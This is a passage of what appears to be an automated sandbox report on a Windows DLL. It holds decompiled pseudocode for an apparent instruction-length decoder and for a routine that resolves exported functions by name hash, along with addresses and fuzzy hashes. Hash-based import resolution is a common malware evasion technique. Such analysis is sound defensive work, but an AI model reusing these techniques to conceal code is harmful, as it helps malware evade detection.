                                                                                                        						_t343 = _t343 | 0x00009000;
                                                                                                        						 *(_t427[0x10] + 0x18) = _t343;
                                                                                                        					}
                                                                                                        					goto L115;
                                                                                                        				} else {
                                                                                                        					_t355 = _t427[0x10];
                                                                                                        					_t343 = _t343 | 0x00000001;
                                                                                                        					 *(_t355 + 0x18) = _t343;
                                                                                                        					_t296 =  *_t274 & 0x000000ff;
                                                                                                        					_t346 =  &(_t427[6]);
                                                                                                        					 *_t346 = _t296;
                                                                                                        					 *(_t355 + 8) = _t296;
                                                                                                        					_t297 = _t296 >> 6;
                                                                                                        					_t427[3] = _t297;
                                                                                                        					 *(_t355 + 9) = _t297;
                                                                                                        					_t299 =  *_t346 & 0x00000007;
                                                                                                        					_t427[7] = _t299;
                                                                                                        					 *(_t355 + 0xb) = _t299;
                                                                                                        					_t301 =  *_t346 & 0x0000003f;
                                                                                                        					 *_t346 = _t301;
                                                                                                        					_t302 = _t301 >> 3;
                                                                                                        					_t427[2] = _t302;
                                                                                                        					 *(_t355 + 0xa) = _t302;
                                                                                                        					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
                                                                                                        						_t343 = _t343 | 0x00003000;
                                                                                                        						 *(_t427[0x10] + 0x18) = _t343;
                                                                                                        					}
                                                                                                        					if(_t427[5] == 0) {
                                                                                                        						_t80 = _t250 - 0xd9; // -217
                                                                                                        						if(_t80 <= 6) {
                                                                                                        							_t81 = _t250 + 0x27; // 0x27
                                                                                                        							_t417 = _t81 & 0x000000ff;
                                                                                                        							if(_t427[3] != 3) {
                                                                                                        								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
                                                                                                        							} else {
                                                                                                        								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
                                                                                                        							}
                                                                                                        							if((_t419 & 0x00000080) != 0) {
                                                                                                        								_t343 = _t343 | 0x00003000;
                                                                                                        								 *(_t427[0x10] + 0x18) = _t343;
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					if(( *_t427 & 0x00000020) == 0) {
                                                                                                        						L53:
                                                                                                        						if(_t427[5] == 0) {
                                                                                                        							if(_t250 == 0x8c) {
                                                                                                        								L86:
                                                                                                        								if(_t427[2] <= 5) {
                                                                                                        									L88:
                                                                                                        									_t427[5] = _t274[0];
                                                                                                        									_t427[4] =  &(_t274[1]);
                                                                                                        									if(_t427[2] <= 1) {
                                                                                                        										if(_t250 != 0xf6) {
                                                                                                        											_t309 = _t427[1];
                                                                                                        											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
                                                                                                        											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
                                                                                                        										} else {
                                                                                                        											_t427[1] = _t427[1] | 0xffffff82;
                                                                                                        										}
                                                                                                        									}
                                                                                                        									if(_t427[3] == 0) {
                                                                                                        										if(( *_t427 & 0x00000010) == 0) {
                                                                                                        											_t264 = 4;
                                                                                                        											_t357 =  ==  ? _t264 : 0;
                                                                                                        										} else {
                                                                                                        											_t273 = 2;
                                                                                                        											_t357 =  ==  ? _t273 : 0;
                                                                                                        										}
                                                                                                        									} else {
                                                                                                        										if(_t427[3] == 1) {
                                                                                                        											_t357 = 1;
                                                                                                        										} else {
                                                                                                        											if(_t427[3] == 2) {
                                                                                                        												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
                                                                                                        											} else {
                                                                                                        												_t357 = 0;
                                                                                                        											}
                                                                                                        										}
                                                                                                        									}
                                                                                                        									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
                                                                                                        										_t307 = _t427[5];
                                                                                                        										_t343 = _t343 | 0x00000002;
                                                                                                        										_t403 = _t427[0x10];
                                                                                                        										_t427[4] =  &(_t274[1]);
                                                                                                        										 *(_t403 + 0xc) = _t307;
                                                                                                        										_t308 = _t307 & 0x00000007;
                                                                                                        										 *(_t403 + 0x18) = _t343;
                                                                                                        										 *(_t403 + 0xd) = _t307 >> 6;
                                                                                                        										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
                                                                                                        										 *(_t403 + 0xf) = _t308;
                                                                                                        										if(_t308 == 5) {
                                                                                                        											_t272 = 4;
                                                                                                        											_t357 =  ==  ? _t272 : _t357;
                                                                                                        										}
                                                                                                        									}
                                                                                                        									if(_t357 == 1) {
                                                                                                        										_t304 = _t427[0x10];
                                                                                                        										_t343 = _t343 | 0x00000020;
                                                                                                        										 *(_t304 + 0x18) = _t343;
                                                                                                        										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
                                                                                                        									} else {
                                                                                                        										if(_t357 == 2) {
                                                                                                        											_t277 = _t427[0x10];
                                                                                                        											_t343 = _t343 | 0x00000040;
                                                                                                        											 *(_t277 + 0x18) = _t343;
                                                                                                        											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
                                                                                                        										} else {
                                                                                                        											if(_t357 == 4) {
                                                                                                        												_t278 = _t427[0x10];
                                                                                                        												_t343 = _t343 | 0x00000080;
                                                                                                        												 *(_t278 + 0x18) = _t343;
                                                                                                        												 *(_t278 + 0x14) =  *(_t427[4] - 1);
                                                                                                        											}
                                                                                                        										}
                                                                                                        									}
                                                                                                        									_t195 = _t427[4] - 1; // -1
                                                                                                        									_t274 = _t357 + _t195;
                                                                                                        									L115:
                                                                                                        									_t251 = _t427[1];
                                                                                                        									_t292 = _t251 & 0x00000040;
                                                                                                        									if((_t251 & 0x00000010) == 0) {
                                                                                                        										L122:
                                                                                                        										if((_t427[1] & 0x00000004) == 0) {
                                                                                                        											L130:
                                                                                                        											if((_t427[1] & 0x00000002) != 0) {
                                                                                                        												_t396 = _t427[0x10];
                                                                                                        												_t343 = _t343 | 0x00000004;
                                                                                                        												 *(_t396 + 0x18) = _t343;
                                                                                                        												_t257 =  *_t274;
                                                                                                        												_t274 =  &(_t274[0]);
                                                                                                        												 *((char*)(_t396 + 0x10)) = _t257;
                                                                                                        											}
                                                                                                        											if(_t292 == 0) {
                                                                                                        												if((_t427[1] & 0x00000020) != 0) {
                                                                                                        													_t293 = _t427[0x10];
                                                                                                        													_t343 = _t343 | 0x00000104;
                                                                                                        													 *(_t293 + 0x18) = _t343;
                                                                                                        													_t255 =  *_t274;
                                                                                                        													_t274 =  &(_t274[0]);
                                                                                                        													 *((char*)(_t293 + 0x10)) = _t255;
                                                                                                        												}
                                                                                                        												goto L136;
                                                                                                        											} else {
                                                                                                        												L133:
                                                                                                        												_t294 = _t427[0x10];
                                                                                                        												_t343 = _t343 | 0x00000110;
                                                                                                        												 *(_t294 + 0x18) = _t343;
                                                                                                        												_t256 =  *_t274;
                                                                                                        												_t274 =  &(_t274[2]);
                                                                                                        												 *(_t294 + 0x10) = _t256;
                                                                                                        												L136:
                                                                                                        												_t275 = _t274 - _t427[0xf];
                                                                                                        												if(_t275 <= 0xf) {
                                                                                                        													 *(_t427[0x10]) = _t275;
                                                                                                        												} else {
                                                                                                        													_t254 = _t427[0x10];
                                                                                                        													_t275 = 0xf;
                                                                                                        													_t254[0x18] = _t343 | 0x00005000;
                                                                                                        													 *_t254 = _t275;
                                                                                                        												}
                                                                                                        												return _t275 & 0x000000ff;
                                                                                                        											}
                                                                                                        										}
                                                                                                        										if((_t343 & 0x00000010) == 0) {
                                                                                                        											if((_t343 & 0x00000008) == 0) {
                                                                                                        												_t397 = _t427[0x10];
                                                                                                        												_t343 = _t343 | 0x00000008;
                                                                                                        												 *(_t397 + 0x18) = _t343;
                                                                                                        												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
                                                                                                        												L129:
                                                                                                        												_t274 =  &(_t274[1]);
                                                                                                        												goto L130;
                                                                                                        											}
                                                                                                        											_t398 = _t427[0x10];
                                                                                                        											_t343 = _t343 | 0x00000800;
                                                                                                        											L127:
                                                                                                        											 *(_t398 + 0x18) = _t343;
                                                                                                        											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
                                                                                                        											goto L129;
                                                                                                        										}
                                                                                                        										_t398 = _t427[0x10];
                                                                                                        										_t343 = _t343 | 0x00000008;
                                                                                                        										goto L127;
                                                                                                        									}
                                                                                                        									if(_t292 == 0) {
                                                                                                        										if(( *_t427 & 0x00000008) == 0) {
                                                                                                        											_t399 = _t427[0x10];
                                                                                                        											_t343 = _t343 | 0x00000010;
                                                                                                        											 *(_t399 + 0x18) = _t343;
                                                                                                        											_t260 =  *_t274;
                                                                                                        											_t274 =  &(_t274[2]);
                                                                                                        											 *(_t399 + 0x10) = _t260;
                                                                                                        										} else {
                                                                                                        											_t400 = _t427[0x10];
                                                                                                        											_t343 = _t343 | 0x00000008;
                                                                                                        											 *(_t400 + 0x18) = _t343;
                                                                                                        											_t261 =  *_t274 & 0x0000ffff;
                                                                                                        											_t274 =  &(_t274[1]);
                                                                                                        											 *(_t400 + 0x10) = _t261;
                                                                                                        										}
                                                                                                        										goto L122;
                                                                                                        									}
                                                                                                        									if(( *_t427 & 0x00000008) == 0) {
                                                                                                        										goto L133;
                                                                                                        									}
                                                                                                        									_t295 = _t427[0x10];
                                                                                                        									_t343 = _t343 | 0x00000108;
                                                                                                        									 *(_t295 + 0x18) = _t343;
                                                                                                        									_t262 =  *_t274 & 0x0000ffff;
                                                                                                        									_t274 =  &(_t274[1]);
                                                                                                        									 *(_t295 + 0x10) = _t262;
                                                                                                        									goto L136;
                                                                                                        								}
                                                                                                        								L87:
                                                                                                        								_t343 = _t343 | 0x00011000;
                                                                                                        								 *(_t427[0x10] + 0x18) = _t343;
                                                                                                        								goto L88;
                                                                                                        							}
                                                                                                        							if(_t250 != 0x8e) {
                                                                                                        								L67:
                                                                                                        								if(_t427[3] != 3) {
                                                                                                        									if(_t427[5] == 0) {
                                                                                                        										goto L88;
                                                                                                        									}
                                                                                                        									if(_t250 == 0xd7 || _t250 == 0xf7) {
                                                                                                        										L84:
                                                                                                        										if(( *_t427 & 0x00000009) != 0) {
                                                                                                        											goto L87;
                                                                                                        										}
                                                                                                        									} else {
                                                                                                        										if(_t250 == 0xd6) {
                                                                                                        											if(( *_t427 & 0x00000006) != 0) {
                                                                                                        												goto L87;
                                                                                                        											}
                                                                                                        											goto L88;
                                                                                                        										}
                                                                                                        										if(_t250 == 0xc5) {
                                                                                                        											goto L87;
                                                                                                        										}
                                                                                                        										if(_t250 == 0x50) {
                                                                                                        											goto L84;
                                                                                                        										}
                                                                                                        									}
                                                                                                        									goto L88;
                                                                                                        								}
                                                                                                        								_t364 = _t427[4];
                                                                                                        								_t312 = _t364 + 0x1da;
                                                                                                        								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
                                                                                                        								_t313 =  !=  ? _t427[9] + _t364 : _t312;
                                                                                                        								_t427[4] = _t366;
                                                                                                        								if(_t366 == _t313) {
                                                                                                        									goto L88;
                                                                                                        								} else {
                                                                                                        									goto L69;
                                                                                                        								}
                                                                                                        								while(1) {
                                                                                                        									L69:
                                                                                                        									_t408 = _t427[4];
                                                                                                        									if(_t250 ==  *_t408) {
                                                                                                        										break;
                                                                                                        									}
                                                                                                        									_t411 = _t408 + 3;
                                                                                                        									_t427[4] = _t411;
                                                                                                        									if(_t411 != _t313) {
                                                                                                        										continue;
                                                                                                        									}
                                                                                                        									goto L88;
                                                                                                        								}
                                                                                                        								_t314 = _t408;
                                                                                                        								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
                                                                                                        									goto L88;
                                                                                                        								}
                                                                                                        								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
                                                                                                        									goto L87;
                                                                                                        								}
                                                                                                        								goto L88;
                                                                                                        							}
                                                                                                        							if(_t427[2] == 1) {
                                                                                                        								goto L87;
                                                                                                        							}
                                                                                                        							goto L86;
                                                                                                        						}
                                                                                                        						if(_t250 == 0x20 || _t250 == 0x22) {
                                                                                                        							_t316 = 3;
                                                                                                        							_t427[3] = _t316;
                                                                                                        							if(_t427[2] > 4 || _t427[2] == 1) {
                                                                                                        								goto L87;
                                                                                                        							} else {
                                                                                                        								goto L88;
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							if(_t250 == 0x21 || _t250 == 0x23) {
                                                                                                        								_t319 = 3;
                                                                                                        								_t427[3] = _t319;
                                                                                                        								if((_t427[6] & 0xfffffff0) == 0x20) {
                                                                                                        									goto L87;
                                                                                                        								}
                                                                                                        								goto L88;
                                                                                                        							} else {
                                                                                                        								goto L67;
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					if(_t427[3] == 3) {
                                                                                                        						L52:
                                                                                                        						_t343 = _t343 | 0x00009000;
                                                                                                        						 *(_t427[0x10] + 0x18) = _t343;
                                                                                                        						goto L53;
                                                                                                        					}
                                                                                                        					_t412 = _t427[4];
                                                                                                        					_t321 = _t250;
                                                                                                        					_t427[8] = _t412 + 0x1b9;
                                                                                                        					if(_t427[5] == 0) {
                                                                                                        						_t413 = _t412 + 0x1a1;
                                                                                                        						_t321 = _t250 & 0x000000fe;
                                                                                                        					} else {
                                                                                                        						_t413 = _t427[8];
                                                                                                        						_t427[8] = _t412 + 0x1cb;
                                                                                                        					}
                                                                                                        					while(_t413 != _t427[8]) {
                                                                                                        						if(_t321 ==  *_t413) {
                                                                                                        							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
                                                                                                        								goto L53;
                                                                                                        							}
                                                                                                        							goto L52;
                                                                                                        						}
                                                                                                        						_t413 = _t413 + 2;
                                                                                                        					}
                                                                                                        					goto L52;
                                                                                                        				}
                                                                                                        			}
                                                                                                        0x6e489510
                                                                                                        0x6e48953a
                                                                                                        0x6e489540
                                                                                                        0x6e489540
                                                                                                        0x6e489548
                                                                                                        0x6e4898f1
                                                                                                        0x6e4898f7
                                                                                                        0x6e4898fd
                                                                                                        0x6e4898fd
                                                                                                        0x00000000
                                                                                                        0x6e48954e
                                                                                                        0x6e48954e
                                                                                                        0x6e489552
                                                                                                        0x6e489555
                                                                                                        0x6e489558
                                                                                                        0x6e48955b
                                                                                                        0x6e48955f
                                                                                                        0x6e489561
                                                                                                        0x6e489564
                                                                                                        0x6e489567
                                                                                                        0x6e48956b
                                                                                                        0x6e489570
                                                                                                        0x6e489573
                                                                                                        0x6e489577
                                                                                                        0x6e48957c
                                                                                                        0x6e48957f
                                                                                                        0x6e489581
                                                                                                        0x6e489584
                                                                                                        0x6e489588
                                                                                                        0x6e48958d
                                                                                                        0x6e48959d
                                                                                                        0x6e4895a3
                                                                                                        0x6e4895a3
                                                                                                        0x6e4895ab
                                                                                                        0x6e4895ad
                                                                                                        0x6e4895b6
                                                                                                        0x6e4895b8
                                                                                                        0x6e4895bb
                                                                                                        0x6e4895c6
                                                                                                        0x6e4895f3
                                                                                                        0x6e4895c8
                                                                                                        0x6e4895df
                                                                                                        0x6e4895df
                                                                                                        0x6e4895fb
                                                                                                        0x6e489601
                                                                                                        0x6e489607
                                                                                                        0x6e489607
                                                                                                        0x6e4895fb
                                                                                                        0x6e4895b6
                                                                                                        0x6e48960e
                                                                                                        0x6e48967f
                                                                                                        0x6e489684
                                                                                                        0x6e4896dd
                                                                                                        0x6e48979f
                                                                                                        0x6e4897a4
                                                                                                        0x6e4897b3
                                                                                                        0x6e4897b9
                                                                                                        0x6e4897bd
                                                                                                        0x6e4897c6
                                                                                                        0x6e4897cd
                                                                                                        0x6e4897d6
                                                                                                        0x6e4897e4
                                                                                                        0x6e4897e7
                                                                                                        0x6e4897cf
                                                                                                        0x6e4897cf
                                                                                                        0x6e4897cf
                                                                                                        0x6e4897cd
                                                                                                        0x6e4897f0
                                                                                                        0x6e48981d
                                                                                                        0x6e489830
                                                                                                        0x6e489838
                                                                                                        0x6e48981f
                                                                                                        0x6e489821
                                                                                                        0x6e489829
                                                                                                        0x6e489829
                                                                                                        0x6e4897f2
                                                                                                        0x6e4897f7
                                                                                                        0x6e489816
                                                                                                        0x6e4897f9
                                                                                                        0x6e4897fe
                                                                                                        0x6e48980f
                                                                                                        0x6e489800
                                                                                                        0x6e489800
                                                                                                        0x6e489800
                                                                                                        0x6e4897fe
                                                                                                        0x6e4897f7
                                                                                                        0x6e489840
                                                                                                        0x6e48984f
                                                                                                        0x6e48985c
                                                                                                        0x6e489865
                                                                                                        0x6e489869
                                                                                                        0x6e48986d
                                                                                                        0x6e489870
                                                                                                        0x6e489873
                                                                                                        0x6e489876
                                                                                                        0x6e489879
                                                                                                        0x6e48987c
                                                                                                        0x6e489882
                                                                                                        0x6e489886
                                                                                                        0x6e48988c
                                                                                                        0x6e48988c
                                                                                                        0x6e489882
                                                                                                        0x6e489892
                                                                                                        0x6e4898cf
                                                                                                        0x6e4898d3
                                                                                                        0x6e4898da
                                                                                                        0x6e4898e0
                                                                                                        0x6e489894
                                                                                                        0x6e489897
                                                                                                        0x6e4898b7
                                                                                                        0x6e4898bb
                                                                                                        0x6e4898c2
                                                                                                        0x6e4898c9
                                                                                                        0x6e489899
                                                                                                        0x6e48989c
                                                                                                        0x6e48989e
                                                                                                        0x6e4898a2
                                                                                                        0x6e4898ac
                                                                                                        0x6e4898b2
                                                                                                        0x6e4898b2
                                                                                                        0x6e48989c
                                                                                                        0x6e489897
                                                                                                        0x6e4898e7
                                                                                                        0x6e4898e7
                                                                                                        0x6e489900
                                                                                                        0x6e489900
                                                                                                        0x6e489906
                                                                                                        0x6e48990b
                                                                                                        0x6e489965
                                                                                                        0x6e48996a
                                                                                                        0x6e4899a9
                                                                                                        0x6e4899ae
                                                                                                        0x6e4899b0
                                                                                                        0x6e4899b4
                                                                                                        0x6e4899b7
                                                                                                        0x6e4899ba
                                                                                                        0x6e4899bc
                                                                                                        0x6e4899bd
                                                                                                        0x6e4899bd
                                                                                                        0x6e4899c2
                                                                                                        0x6e4899e0
                                                                                                        0x6e4899e2
                                                                                                        0x6e4899e6
                                                                                                        0x6e4899ec
                                                                                                        0x6e4899ef
                                                                                                        0x6e4899f1
                                                                                                        0x6e4899f2
                                                                                                        0x6e4899f2
                                                                                                        0x00000000
                                                                                                        0x6e4899c4
                                                                                                        0x6e4899c4
                                                                                                        0x6e4899c4
                                                                                                        0x6e4899c8
                                                                                                        0x6e4899ce
                                                                                                        0x6e4899d1
                                                                                                        0x6e4899d3
                                                                                                        0x6e4899d6
                                                                                                        0x6e4899f5
                                                                                                        0x6e4899f5
                                                                                                        0x6e4899fc
                                                                                                        0x6e489a16
                                                                                                        0x6e4899fe
                                                                                                        0x6e4899fe
                                                                                                        0x6e489a0a
                                                                                                        0x6e489a0b
                                                                                                        0x6e489a0e
                                                                                                        0x6e489a0e
                                                                                                        0x6e489a24
                                                                                                        0x6e489a24
                                                                                                        0x6e4899c2
                                                                                                        0x6e48996f
                                                                                                        0x6e48997d
                                                                                                        0x6e489995
                                                                                                        0x6e489999
                                                                                                        0x6e48999c
                                                                                                        0x6e4899a2
                                                                                                        0x6e4899a6
                                                                                                        0x6e4899a6
                                                                                                        0x00000000
                                                                                                        0x6e4899a6
                                                                                                        0x6e48997f
                                                                                                        0x6e489983
                                                                                                        0x6e489989
                                                                                                        0x6e489989
                                                                                                        0x6e48998f
                                                                                                        0x00000000
                                                                                                        0x6e48998f
                                                                                                        0x6e489971
                                                                                                        0x6e489975
                                                                                                        0x00000000
                                                                                                        0x6e489975
                                                                                                        0x6e48990f
                                                                                                        0x6e48993b
                                                                                                        0x6e489953
                                                                                                        0x6e489957
                                                                                                        0x6e48995a
                                                                                                        0x6e48995d
                                                                                                        0x6e48995f
                                                                                                        0x6e489962
                                                                                                        0x6e48993d
                                                                                                        0x6e48993d
                                                                                                        0x6e489941
                                                                                                        0x6e489944
                                                                                                        0x6e489947
                                                                                                        0x6e48994a
                                                                                                        0x6e48994d
                                                                                                        0x6e48994d
                                                                                                        0x00000000
                                                                                                        0x6e48993b
                                                                                                        0x6e489915
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e48991b
                                                                                                        0x6e48991f
                                                                                                        0x6e489925
                                                                                                        0x6e489928
                                                                                                        0x6e48992b
                                                                                                        0x6e48992e
                                                                                                        0x00000000
                                                                                                        0x6e48992e
                                                                                                        0x6e4897a6
                                                                                                        0x6e4897aa
                                                                                                        0x6e4897b0
                                                                                                        0x00000000
                                                                                                        0x6e4897b0
                                                                                                        0x6e4896e8
                                                                                                        0x6e4896fa
                                                                                                        0x6e4896ff
                                                                                                        0x6e48976a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e489771
                                                                                                        0x6e489797
                                                                                                        0x6e48979b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e48977a
                                                                                                        0x6e48977f
                                                                                                        0x6e489793
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e489795

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
                                                                                                        • Instruction ID: c1c6277af1538eabc44da605f2fddd538651f58f9ffa02dda2f5d95715144943
                                                                                                        • Opcode Fuzzy Hash: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
                                                                                                        • Instruction Fuzzy Hash: 54228031408B96CBD715CE65C49176BBBE0BF86300F00886EEAE957391D376D985CB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 90%
                                                                                                        			E6E48143C(signed char __eax, signed char __edx) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed char _t231;
                                                                                                        				signed char _t233;
                                                                                                        				signed char _t238;
                                                                                                        				intOrPtr _t241;
                                                                                                        				void* _t246;
                                                                                                        				signed char _t257;
                                                                                                        				signed char _t261;
                                                                                                        				signed char _t269;
                                                                                                        				signed char _t270;
                                                                                                        				signed char _t277;
                                                                                                        				signed int _t279;
                                                                                                        				signed char _t280;
                                                                                                        				signed char _t281;
                                                                                                        				void* _t289;
                                                                                                        				void* _t290;
                                                                                                        				signed char _t315;
                                                                                                        				void* _t319;
                                                                                                        				signed char _t334;
                                                                                                        				signed char _t336;
                                                                                                        				void* _t341;
                                                                                                        				void* _t347;
                                                                                                        				intOrPtr _t352;
                                                                                                        				signed char _t354;
                                                                                                        				signed char _t363;
                                                                                                        				void* _t369;
                                                                                                        				intOrPtr _t371;
                                                                                                        				signed short* _t373;
                                                                                                        				void _t375;
                                                                                                        				void* _t379;
                                                                                                        				signed int _t381;
                                                                                                        				void* _t382;
                                                                                                        				void** _t383;
                                                                                                        				void* _t384;
                                                                                                        				char* _t387;
                                                                                                        				signed char _t395;
                                                                                                        				signed char* _t396;
                                                                                                        				intOrPtr _t400;
                                                                                                        				signed int _t451;
                                                                                                        				intOrPtr* _t455;
                                                                                                        				signed char _t456;
                                                                                                        				signed int _t462;
                                                                                                        				void* _t467;
                                                                                                        				signed char _t471;
                                                                                                        				signed char _t472;
                                                                                                        				signed char* _t477;
                                                                                                        				signed char _t487;
                                                                                                        				signed int _t490;
                                                                                                        				intOrPtr* _t496;
                                                                                                        				intOrPtr _t497;
                                                                                                        				signed char _t498;
                                                                                                        				signed char _t499;
                                                                                                        				intOrPtr _t500;
                                                                                                        				signed char _t508;
                                                                                                        				intOrPtr _t510;
                                                                                                        				void* _t513;
                                                                                                        				signed char _t519;
                                                                                                        				intOrPtr* _t524;
                                                                                                        				signed char _t525;
                                                                                                        				signed char _t526;
                                                                                                        				signed char _t527;
                                                                                                        				signed char _t529;
                                                                                                        				signed char* _t531;
                                                                                                        				signed char _t532;
                                                                                                        				void* _t533;
                                                                                                        				void* _t534;
                                                                                                        				signed char* _t535;
                                                                                                        
                                                                                                        				_t535[0x54] = __edx;
                                                                                                        				 *_t535 = __eax;
                                                                                                        				_t231 = E6E480304(__edx, 1);
                                                                                                        				if(_t231 != 0) {
                                                                                                        					return _t231;
                                                                                                        				}
                                                                                                        				_t535[0x2c] = _t231;
                                                                                                        				if( *0x6e48d208 == 0 ||  *0x6e48d2e4 != 0) {
                                                                                                        					L44:
                                                                                                        					if( *_t535 == 0) {
                                                                                                        						return 0;
                                                                                                        					}
                                                                                                        					_t233 =  *_t535;
                                                                                                        					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
                                                                                                        					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
                                                                                                        					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
                                                                                                        					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
                                                                                                        					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
                                                                                                        					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
                                                                                                        						L77:
                                                                                                        						 *_t535 = 0;
                                                                                                        						_t535[0x2c] = 0;
                                                                                                        						L78:
                                                                                                        						return  *_t535;
                                                                                                        					}
                                                                                                        					_t535[0x12c] = 0;
                                                                                                        					_t535[0x174] = _t535[0x54] ^ 0xe462d21c;
                                                                                                        					do {
                                                                                                        						_t467 = 0;
                                                                                                        						_t387 =  *_t524 +  *_t535;
                                                                                                        						_t238 =  *_t387;
                                                                                                        						_t535[0x58] = _t238;
                                                                                                        						if(_t238 == 0) {
                                                                                                        							L49:
                                                                                                        							if(E6E484FFC( &(_t535[0x58]), _t467) == _t535[0x174]) {
                                                                                                        								_t535[0x2c] = 0;
                                                                                                        								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
                                                                                                        								__eflags = _t241 - _t510;
                                                                                                        								if(_t241 < _t510) {
                                                                                                        									L57:
                                                                                                        									_t471 =  *_t535 + _t241;
                                                                                                        									__eflags = _t471;
                                                                                                        									 *_t535 = _t471;
                                                                                                        									_t535[0x2c] = _t471;
                                                                                                        									L58:
                                                                                                        									__eflags =  *_t535;
                                                                                                        									if( *_t535 == 0) {
                                                                                                        										goto L78;
                                                                                                        									}
                                                                                                        									__eflags =  *0x6e48d2f0 |  *0x6e48d2f1;
                                                                                                        									if(( *0x6e48d2f0 |  *0x6e48d2f1) == 0) {
                                                                                                        										_t525 =  *0x6e48d208; // 0x3091340
                                                                                                        										__eflags = _t525;
                                                                                                        										if(_t525 == 0) {
                                                                                                        											 *0x6e48d2f0 = 1;
                                                                                                        											_t526 = E6E48361C(0x1c4);
                                                                                                        											__eflags = _t526;
                                                                                                        											if(_t526 == 0) {
                                                                                                        												_t526 = 0;
                                                                                                        												__eflags = 0;
                                                                                                        											} else {
                                                                                                        												E6E481C30(_t526, 0x10);
                                                                                                        												 *(_t526 + 0x1c0) = 0;
                                                                                                        											}
                                                                                                        											 *0x6e48d208 = _t526;
                                                                                                        											 *0x6e48d2f0 = 0;
                                                                                                        											L68:
                                                                                                        											_t246 = 0;
                                                                                                        											_t472 = 0;
                                                                                                        											__eflags = 0;
                                                                                                        											while(1) {
                                                                                                        												__eflags =  *(_t472 + _t526 + 8);
                                                                                                        												if( *(_t472 + _t526 + 8) == 0) {
                                                                                                        													break;
                                                                                                        												}
                                                                                                        												_t246 = _t246 + 1;
                                                                                                        												_t472 = _t472 + 0x1c;
                                                                                                        												__eflags = _t246 - 0x10;
                                                                                                        												if(_t246 < 0x10) {
                                                                                                        													continue;
                                                                                                        												}
                                                                                                        												_t375 = E6E48361C(0x1c4);
                                                                                                        												__eflags = _t375;
                                                                                                        												if(_t375 == 0) {
                                                                                                        													_t375 = 0;
                                                                                                        													__eflags = 0;
                                                                                                        												} else {
                                                                                                        													E6E481C30(_t375, 0x10);
                                                                                                        													 *(_t375 + 0x1c0) = 0;
                                                                                                        												}
                                                                                                        												 *(_t375 + 0x14) = _t535[0x2c];
                                                                                                        												E6E47DFC0(_t375,  &(_t535[0x58]));
                                                                                                        												 *(_t375 + 8) = _t535[0x54];
                                                                                                        												 *(_t526 + 0x1c0) = _t375;
                                                                                                        												L76:
                                                                                                        												 *_t535 = _t535[0x2c];
                                                                                                        												goto L78;
                                                                                                        											}
                                                                                                        											_t527 = _t526 + _t472;
                                                                                                        											__eflags = _t527;
                                                                                                        											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
                                                                                                        											E6E47DFC0(_t527,  &(_t535[0x58]));
                                                                                                        											 *(_t527 + 8) = _t535[0x54];
                                                                                                        											goto L76;
                                                                                                        										}
                                                                                                        										_t257 =  *(_t525 + 0x1c0);
                                                                                                        										while(1) {
                                                                                                        											__eflags = _t257;
                                                                                                        											if(_t257 == 0) {
                                                                                                        												goto L68;
                                                                                                        											}
                                                                                                        											_t526 = _t257;
                                                                                                        											_t257 =  *(_t257 + 0x1c0);
                                                                                                        										}
                                                                                                        										goto L68;
                                                                                                        									}
                                                                                                        									__eflags = _t535[0x54] - 0x1c6ef387;
                                                                                                        									if(_t535[0x54] == 0x1c6ef387) {
                                                                                                        										 *0x6e48d20c =  *_t535;
